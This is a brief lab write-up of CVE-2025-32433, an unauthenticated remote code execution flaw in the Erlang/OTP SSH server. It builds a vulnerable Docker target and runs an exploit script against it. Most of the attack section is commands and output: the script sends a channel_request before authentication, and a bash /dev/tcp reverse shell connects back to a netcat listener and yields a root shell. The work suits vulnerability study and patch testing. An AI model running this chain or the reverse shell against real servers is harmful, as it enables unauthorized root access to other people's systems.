OTP SSH — CVE-2025-32433

A critical vulnerability in the Erlang/OTP SSH server allows unauthenticated remote code execution. The SSH implementation processes certain message types such as channel_request before authentication is complete — violating RFC 4252 Section 6.

An attacker can establish a TCP connection, send a valid SSH_MSG_KEXINIT, skip authentication entirely, then send a channel_request with exec containing arbitrary Erlang code. The payload reaches Erlang's evaluation path without any credential check.

File(s): ssh_server.erl Dockerfile

ssh_server.erl starts a vulnerable SSH daemon on port 2222 with password authentication that always rejects credentials. A Dockerfile based on Debian Bookworm builds Erlang/OTP 26.2.5.10 from source, generates RSA keys, and runs the server.

docker build -t erlang-ssh .
docker run -d --name erlang-ssh -p 2222:2222 erlang-ssh

Verify connectivity:

nc 127.0.0.1 2222 -v

Expected response: SSH-2.0-Erlang/5.1.4.7

File(s): cve-2025-32433.py

The exploit script bypasses authentication and executes arbitrary shell commands via Erlang code injection. Start a listener, then run the script and enter the reverse shell command when prompted:

kdev :: ~/erlang/CVE-2025-32433 » python3 cve-2025-32433.py -t 127.0.0.1 -p 2222
[*] Connecting to SSH server...
[✓] Banner: SSH-2.0-Erlang/5.1.4.7
[*] Sending KEXINIT...
[*] Opening channel...
[?] Shell command: bash -i >& /dev/tcp/172.17.0.1/4488 0>&1
[*] Sending CHANNEL_REQUEST...
[✓] Payload sent.

kdev :: ~ » nc -lvnp 4488
listening on [any] 4488 ...
connect to [172.17.0.1] from (UNKNOWN) [172.17.0.2] 58338
 
root@cf0f300797ea:~# id && hostname
uid=0(root) gid=0(root) groups=0(root)
cf0f300797ea

1. [1]CVE-2025-32433 — NIST
2. [2]0xPThree — cve-2025-32433 PoC